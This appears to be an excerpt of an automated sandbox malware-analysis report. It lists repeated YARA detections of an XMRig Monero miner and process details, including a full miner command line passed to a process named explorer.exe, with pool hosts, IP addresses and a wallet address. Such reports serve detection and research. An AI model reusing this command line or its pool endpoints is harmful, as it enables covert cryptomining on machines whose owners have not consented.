                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000000.724751295.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000011.00000000.717951007.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000011.00000000.717951007.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000000.717951007.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000011.00000000.704736312.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000011.00000000.704736312.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000000.704736312.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000011.00000000.713985115.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000011.00000000.713985115.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000000.713985115.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000011.00000000.708825337.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000011.00000000.708825337.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000000.708825337.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000011.00000000.716519488.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000011.00000000.716519488.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000000.716519488.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000011.00000000.706517358.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000011.00000000.706517358.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000000.706517358.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000011.00000000.721988497.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000011.00000000.721988497.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000000.721988497.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000011.00000000.702282973.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000011.00000000.702282973.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000000.702282973.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000011.00000000.710365911.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000011.00000000.710365911.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000000.710365911.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        Reputation:high

                                                        General

                                                        Start time:18:20:18
                                                        Start date:01/11/2021
                                                        Path:C:\Windows\explorer.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100
                                                        Imagebase:0x7ff6fee60000
                                                        File size:3933184 bytes
                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000012.00000000.782826325.0000000140753000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000012.00000000.728904022.0000000140753000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000012.00000000.744667827.0000000140753000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000012.00000000.718963137.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000012.00000000.718963137.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000012.00000000.718963137.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000012.00000000.825932798.0000000140753000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000012.00000000.713121937.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000012.00000000.713121937.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000012.00000000.713121937.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000012.00000000.715770261.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000012.00000000.715770261.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000012.00000000.715770261.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000012.00000000.769937970.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000012.00000000.769937970.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000012.00000000.769937970.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000012.00000000.724515509.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000012.00000000.724515509.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000012.00000000.724515509.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000012.00000000.704591182.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000012.00000000.704591182.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000012.00000000.704591182.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000012.00000000.797286728.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000012.00000000.797286728.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000012.00000000.797286728.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000012.00000000.727173943.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000012.00000000.727173943.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000012.00000000.727173943.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000012.00000000.729811300.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000012.00000000.729811300.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000012.00000000.729811300.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000012.00000000.721557142.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000012.00000000.721557142.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000012.00000000.721557142.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000012.00000000.710976279.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000012.00000000.710976279.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000012.00000000.710976279.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000012.00000000.706240409.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000012.00000000.706240409.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000012.00000000.706240409.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        Reputation:high
